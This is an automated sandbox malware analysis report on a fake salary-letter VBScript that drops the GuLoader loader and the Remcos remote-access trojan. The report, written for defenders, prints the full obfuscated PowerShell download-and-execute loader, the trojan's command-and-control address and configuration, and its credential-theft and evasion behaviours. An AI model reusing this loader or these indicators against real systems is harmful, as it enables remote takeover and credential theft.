Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Salary Increase Letter_Oct 2024.vbs

Overview

General Information

Sample name:Salary Increase Letter_Oct 2024.vbs
Analysis ID:1530593
MD5:35c0401fa3a0988df57e978eaa661dd2
SHA1:a07a742be842b55f4218d8c9f6f2287c21baf2db
SHA256:165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4900 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3976 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6672 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5836 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2104 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3580 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1540 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 7 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_948.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine|base64offset|contains: "w+y, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", ProcessId: 6232, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.2.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49893
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine|base64offset|contains: "w+y, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", ProcessId: 6232, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 8E 1F EB C8 62 04 44 BA 00 BA CC CA DB 7F D9 C1 25 1A 7F FA B6 B8 1E 38 9C 1A 30 66 20 5B 2C 3A D0 B5 2A B8 AB 7C 68 DB 3D AA AC 30 D0 05 AE 9C 21 E3 82 90 46 D0 B6 AC 39 2B 2C 94 B1 61 9E C0 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 3976, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:28:00.605083+020020365941Malware Command and Control Activity Detected192.168.2.649915154.216.17.142404TCP
              2024-10-10T09:28:01.917571+020020365941Malware Command and Control Activity Detected192.168.2.649926154.216.17.142404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:28:01.781683+020028033043Unknown Traffic192.168.2.649927178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-10T09:27:56.635535+020028032702Potentially Bad Traffic192.168.2.649893104.21.2.680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for submitted file
              Source: Salary Increase Letter_Oct 2024.vbsVirustotal: Detection: 7%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
              Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<.oeaccountC#z source: msiexec.exe, 0000000D.00000002.2629663448.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627803746.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627748759.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp
